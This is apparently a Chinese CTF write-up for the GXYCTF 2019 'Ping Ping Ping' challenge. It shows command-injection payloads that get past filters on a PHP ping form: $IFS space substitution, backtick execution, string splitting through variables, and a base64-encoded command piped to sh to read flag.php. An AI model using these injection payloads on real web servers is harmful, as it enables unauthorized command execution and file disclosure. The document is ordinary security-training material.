[GXYCTF 2019]Ping Ping Ping

[GXYCTF 2019]Ping Ping Ping wp

关于命令执行相关知识可以看这篇博客:

CTFping命令绕过及符号用法

本文只写做题流程及几种解法。

信息搜集

页面:

[GXYCTF 2019]Ping Ping Ping_第1张图片

毫无疑问,这是一道 ping 命令执行的题。

简单测试一下
127.0.0.1;ls

返回:

[GXYCTF 2019]Ping Ping Ping_第2张图片

说明存在命令执行,且分号没被过滤。

获取 flag

简单测试一下,就会发现过滤了很多东西,比如空格,大括号,“flag” 字符串等等。

$IFS$9 代替空格查看一下 index.php 文件内容:

;cat$IFS$9index.php

[GXYCTF 2019]Ping Ping Ping_第3张图片

那么就可以构造以下几种 payload :

payload1:反引号命令执行
;cat$IFS$9`ls`

反引号内的内容会先被当成命令执行,再将执行结果作为外部命令的一部分再去执行。

在这里就是先执行 ls ,结果为 index.php flag.php ,再 cat 查看这些文件。其作用等同于 cat * 查看当前目录下所有文件,但是 ‘*’ 被过滤了。

payload2:变量赋值再使用
;b=ag;a=fl;cat$IFS$1$a$b.php

意思就是将 “ag” 赋值给变量 b ,将 “fl” 赋值给变量 a ,最后拼接起来,$a$b 就是 “flag” ,这样就绕过了对 “flag” 字符串的检测。

$IFS$1 也是用于替换空格。

payload3:base64 编码
;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

其中 Y2F0IGZsYWcucGhw 就是 cat flag.php 的 base64 编码。

“|” 是管道符,将上一条命令输出的结果作为下一条命令的输入。

base64 -d 是 Linux 中用于将字符串进行 base64 解码的命令。

sh 用于执行 shell 命令。

以此方式达成用 sh 命令执行 cat flag.php 的效果。

其实与之相似的 payload 还有:

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash

但是 bash 被过滤了。

flag 在源码里

执行以上命令后,去源码里找 flag :
[GXYCTF 2019]Ping Ping Ping_第4张图片

你可能感兴趣的:(ctf,web安全,网络安全,php)